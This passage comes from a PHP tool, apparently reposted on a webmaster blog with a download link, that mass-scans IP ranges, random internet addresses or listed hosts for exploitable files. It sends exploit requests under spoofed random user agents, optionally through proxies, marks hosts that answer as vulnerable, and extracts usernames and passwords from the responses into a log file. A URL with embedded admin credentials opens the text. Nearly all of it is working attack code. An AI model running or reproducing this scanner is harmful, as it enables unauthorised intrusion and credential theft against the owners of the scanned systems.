'http://admin:12334@172.16.0.90:8080' \n{$_SESSION["c01"]}{$msg}{$_SESSION["c00"]}\n"); (is_null($op)) ? exit() : NULL; } //CREATING FORMATTING IPS FOR BAND function __getRange($range) { $ip = explode('.', $range); if (is_array($ip) && count($ip) == 4) { $ip[0] = (strstr($ip[0], '-')) ? explode('-', $ip[0]) : explode('-', "{$ip[0]}-{$ip[0]}"); $ip[1] = (strstr($ip[1], '-')) ? explode('-', $ip[1]) : explode('-', "{$ip[1]}-{$ip[1]}"); $ip[2] = (strstr($ip[2], '-')) ? explode('-', $ip[2]) : explode('-', "{$ip[2]}-{$ip[2]}"); $ip[3] = (strstr($ip[3], '-')) ? explode('-', $ip[3]) : explode('-', "{$ip[3]}-{$ip[3]}"); return $ip; } else { return FALSE; } } //GENERATING IPS RANDOM function __getIPRandom() { $bloc1 = rand(0, 255); $bloc2 = rand(0, 255); $bloc3 = rand(0, 255); $bloc4 = rand(0, 255); $ip = "{$bloc1}.{$bloc2}.{$bloc3}.{$bloc4}"; return $ip; } //OPENING FILE FILE IPS function __getIPFile($file) { if (isset($file) && !empty($file)) { $resultIP = array_unique(array_filter(explode("\n", file_get_contents($file)))); __plus(); if (is_array($resultIP)) { return ($resultIP); } } return FALSE; } //AGENT REQUEST RANDOM function __getUserAgentRandom() { //AGENT BROSER $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox', 'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror' ); //AGENT OPERATING SYSTEM $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD', 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix', 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android' ); //AGENT LOCAL FAKE $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO', 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar', 'be_BY', 'be', 
'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK' ); return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ''; } //SEND REQUEST SERVER function __request($params) { $objcurl = curl_init(); $status = array(); curl_setopt($objcurl, CURLOPT_URL, "http://{$params['host']}{$params['exploit']}"); (!is_null($params['proxy']) ? curl_setopt($objcurl, CURLOPT_PROXY, $params['proxy']) : NULL); curl_setopt($objcurl, CURLOPT_USERAGENT, __getUserAgentRandom()); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl); __plus(); $server = curl_getinfo($objcurl); __plus(); //FILTERING SERVER INFORMATION preg_match_all('(HTTP.*)', $info['corpo'], $status['http']); preg_match_all('(Server:.*)', $info['corpo'], $status['server']); preg_match_all('(X-Powered-By:.*)', $info['corpo'], $status['X-Powered-By']); $info['dados_01'] = $server; $info['dados_02'] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}")); curl_close($objcurl); __plus(); return $info; } //SUB PROCESS function __subProcess($params, $target) { foreach ($params['exploit_model'] as $camp => $value) { $params['exploit'] = $value; $params['exploit_model'] = $camp; $params['host'] = $target; $rest = __request($params); __plus(); if ($rest['dados_01']['http_code'] != 0) { break; } } __plus(); $_SESSION["cont_ip"] ++; if ($rest['dados_01']['http_code'] == 200) { //FOUND FILE $style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . 
"{$_SESSION["c05"]}"; echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; $output_view = "{$style_var} [ ! ]__[iNFO][COD]: {$rest['dados_01']['http_code']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][iP/FILE]: {$params['host']}{$params['exploit']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][MODEL]: {$params['exploit_model']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_1]: {$rest['dados_02']}\n{$_SESSION["c00"]}"; $info_ip = __infoIP($rest['dados_01']['primary_ip']); $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_2]: {$info_ip}\n{$_SESSION["c00"]}"; echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"]; $output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}"; file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND); __plus(); } else { //FILE NOT FOUND echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}"; } echo $_SESSION["c07"] . $params['line'] . 
$_SESSION["c00"]; } function main($params) { //IMPLEMENTATION HOME echo __banner("{$_SESSION["c13"]}{$params['line']}\n{$_SESSION["c00"]}", 1); if ($params['op'] == 0) { //WORKING WITH IPS ON TRACK for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) { __plus(); __subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}"); __plus(); } } elseif ($params['op'] == 1) { //WORKING WITH IP RANDOM !not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL; for ($i = 0; $i <= $params['limit-ip']; $i++) { __subProcess($params, __getIPRandom()); __plus(); } } elseif ($params['op'] == 2) { //IP WORK SOURCE FILE !is_array($params['file']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL; __plus(); foreach ($params['file'] as $value) { __subProcess($params, $value); __plus(); } } } //RUNNING ALL PROCESS main($params); Mirror Source
  25. Demo I Download Password: baywebmaster.com BayWebMaster | A WebMaster Blog